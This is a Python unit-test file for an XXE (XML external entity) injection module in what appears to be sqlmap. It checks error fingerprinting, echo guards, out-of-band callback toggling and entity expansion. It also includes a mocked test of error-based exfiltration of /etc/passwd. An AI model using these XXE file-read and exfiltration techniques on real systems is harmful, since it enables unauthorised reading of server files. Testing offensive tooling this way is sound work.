self.assertTrue(xxe._echoed("mirror <!ENTITY x ..."))
self.assertFalse(xxe._echoed("Hello, expanded value!"))
def test_fingerprint(self):
self.assertIsNotNone(xxe._fingerprint('failed to load external entity "file:///x"'))
self.assertIsNotNone(xxe._fingerprint('failed to load "file:///x": No such file')) # PHP form
self.assertIsNotNone(xxe._fingerprint("org.xml.sax.SAXParseException: DOCTYPE"))
self.assertIsNone(xxe._fingerprint("perfectly normal response"))
def test_confirm_read_baseline_guard(self):
pattern = r"(?i)^(?:NAME|ID|VERSION)="
page = "content:\nNAME=\"Ubuntu\"\nID=ubuntu"
self.assertIsNotNone(xxe._confirmRead(page, pattern, baseline="unrelated"))
# a line already present in the baseline must not count as a read
self.assertIsNone(xxe._confirmRead("NAME=\"Ubuntu\"", pattern, baseline="NAME=\"Ubuntu\""))
class TestOobToggle(unittest.TestCase):
def test_oob_enabled_default(self):
conf.oobServer = None
self.assertTrue(xxe._oobEnabled())
def test_oob_disabled_sentinels(self):
for sentinel in ("none", "off", "0", "No", "DISABLE", "false"):
conf.oobServer = sentinel
self.assertFalse(xxe._oobEnabled(), "'%s' should disable OOB" % sentinel)
conf.oobServer = None
def test_oob_custom_server_enabled(self):
conf.oobServer = "myinteractsh.example.com"
self.assertTrue(xxe._oobEnabled())
conf.oobServer = None
class TestDetectionMocked(unittest.TestCase):
def setUp(self):
self._send = xxe._send
xxe.SENTINEL = "sentineltoken1"
def tearDown(self):
xxe._send = self._send
def test_internal_reflected_positive(self):
xxe._send = lambda body: "Hello, %s! (parsed)" % xxe.SENTINEL
payload, _ = xxe._tryInternal("<u><n>luther</n></u>", "u", baseline="Hello, luther!")
self.assertIsNotNone(payload)
def test_internal_echo_rejected(self):
# endpoint mirrors the raw body back (never parses) -> must NOT be a hit
xxe._send = lambda body: "You sent: %s" % body
payload, _ = xxe._tryInternal("<u><n>luther</n></u>", "u", baseline="You sent: <u><n>luther</n></u>")
self.assertIsNone(payload)
def test_internal_baseline_contains_sentinel_rejected(self):
xxe._send = lambda body: "Hello, %s!" % xxe.SENTINEL
payload, _ = xxe._tryInternal("<u><n>luther</n></u>", "u", baseline="already %s here" % xxe.SENTINEL)
self.assertIsNone(payload)
def test_error_based_positive(self):
xxe._send = lambda body: 'XML error: failed to load external entity "file:///%s/nonexistent"' % xxe.SENTINEL
payload, page = xxe._tryError("<u><n>x</n></u>", "u")
self.assertIsNotNone(payload)
self.assertIsNotNone(xxe._fingerprint(page))
def test_error_based_echo_rejected(self):
xxe._send = lambda body: "You sent: %s" % body # echoes DOCTYPE/ENTITY -> _echoed guard
payload, _ = xxe._tryError("<u><n>x</n></u>", "u")
self.assertIsNone(payload)
def test_error_exfil_extraction_base64(self):
import base64
from lib.core.convert import getText
secret = getText(base64.b64encode(b"root:x:0:0:root:/root:/bin/sh"))
def mock(body):
m = re.search(r'file:///(\w+)/&#x25;file;', body) or re.search(r'file:///(\w+)/%file;', body)
marker = m.group(1) if m else "zzz"
return 'failed to load "file:///%s/%s"' % (marker, secret)
xxe._send = mock
conf.fileRead = "/etc/passwd"
try:
content, name = xxe._tryErrorExfil("<u><n>x</n></u>", "u")
finally:
conf.fileRead = None
self.assertEqual(name, "/etc/passwd")
self.assertIn("root:x:0:0", content or "")
class TestRealXmlPayloads(unittest.TestCase):
"""Prove crafted payloads are well-formed and actually expand the entity."""
@staticmethod
def _expand(payload):
try:
from lxml import etree
except ImportError:
raise unittest.SkipTest("lxml not available")
parser = etree.XMLParser(resolve_entities=True, load_dtd=True, no_network=True, huge_tree=False)
doc = etree.fromstring(payload.encode("utf-8"), parser)
return "".join(doc.itertext())
def test_internal_entity_expands(self):
xxe.SENTINEL = "realxmlsentinel"
ent = "abcd"
subset = '<!ENTITY %s "%s">' % (ent, xxe.SENTINEL)
payload = xxe._placeRef(xxe._buildDoctype("<u><n>luther</n></u>", "u", subset), "&%s;" % ent)
self.assertIn(xxe.SENTINEL, self._expand(payload))
def test_internal_entity_expands_with_existing_doctype(self):
xxe.SENTINEL = "realxmlsentinel2"
ent = "efgh"
subset = '<!ENTITY %s "%s">' % (ent, xxe.SENTINEL)
base = '<?xml version="1.0"?><!DOCTYPE u [<!ELEMENT n ANY>]><u><n>luther</n></u>'
payload = xxe._placeRef(xxe._buildDoctype(base, "u", subset), "&%s;" % ent)
self.assertIn(xxe.SENTINEL, self._expand(payload))
def test_attribute_entity_expands(self):
xxe.SENTINEL = "attrsentinel"
ent = "ijkl"
subset = '<!ENTITY %s "%s">' % (ent, xxe.SENTINEL)
payload = xxe._placeRef(xxe._buildDoctype('<u id="1"><n>x</n></u>', "u", subset), "&%s;" % ent, attrs=True)
self.assertIn(xxe.SENTINEL, self._expand(payload))
if __name__ == "__main__":
unittest.main()